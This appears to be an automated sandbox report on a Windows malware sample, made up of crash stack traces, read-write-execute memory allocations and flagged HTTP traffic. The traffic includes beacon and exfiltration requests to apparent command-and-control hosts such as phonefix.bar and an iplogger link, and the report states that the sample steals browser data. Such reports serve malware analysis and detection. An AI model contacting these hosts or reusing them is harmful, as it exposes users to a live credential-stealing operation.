__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 43055032 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 43053224 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462437 0x8462388 0xafb7e9 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 44498304 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 44496496 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 41272452 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 41270644 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 42717880 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 42716072 registers.esi: 39943948 registers.ecx: 17744000	1
__exception__ Sept. 12, 2021, 3:11 p.m.	stacktrace: 0x8462797 0x84626e8 0xafb867 0xaf3105 0xaf2a3f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x723a1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x723a1737 mscorlib+0x2d36ad @ 0x6ef536ad mscorlib+0x308f2d @ 0x6ef88f2d 0xaf097c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72322652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7233264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72332e95 CopyPDBs+0x4c45 DllCanUnloadNowInternal-0x3c392 clr+0x19a887 @ 0x724ba887 DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723e7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72471dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72471e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72471f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7247416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73cef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73d67f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73d64de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d8 0f b6 45 dc 85 c0 0f 84 ef 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xafbf6a registers.esp: 3993064 registers.edi: 44163308 registers.eax: 0 registers.ebp: 3993112 registers.edx: 7036824 registers.ebx: 44161500 registers.esi: 39943948 registers.ecx: 17744000	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_1
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_2
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_3
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_4
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_5
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_6
suspicious_features	GET method with no useragent header	suspicious_request	GET https://startupmart.bar/?user_auth=p4_7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://phonefix.bar/api.php?getusers
suspicious_features	GET method with no useragent header	suspicious_request	GET https://iplogger.org/1aGEa7
suspicious_features	GET method with no useragent header	suspicious_request	GET https://phonefix.bar/api.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://phonefix.bar/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://wheelllc.bar/api.php

Performs some HTTP requests (13 events)

request	GET https://startupmart.bar/?user_auth=p4_1
request	GET https://startupmart.bar/?user_auth=p4_2
request	GET https://startupmart.bar/?user_auth=p4_3
request	GET https://startupmart.bar/?user_auth=p4_4
request	GET https://startupmart.bar/?user_auth=p4_5
request	GET https://startupmart.bar/?user_auth=p4_6
request	GET https://startupmart.bar/?user_auth=p4_7
request	GET https://phonefix.bar/api.php?getusers
request	GET https://iplogger.org/1c6My7
request	GET https://iplogger.org/1aGEa7
request	GET https://phonefix.bar/api.php
request	POST https://phonefix.bar/
request	GET https://wheelllc.bar/api.php

Sends data using the HTTP POST Method (1 event)

request

POST https://phonefix.bar/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 456 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002040000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000021e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000160000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000160000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000160000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000162000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 12, 2021, 2:45 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000000016b000 process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (27 events)

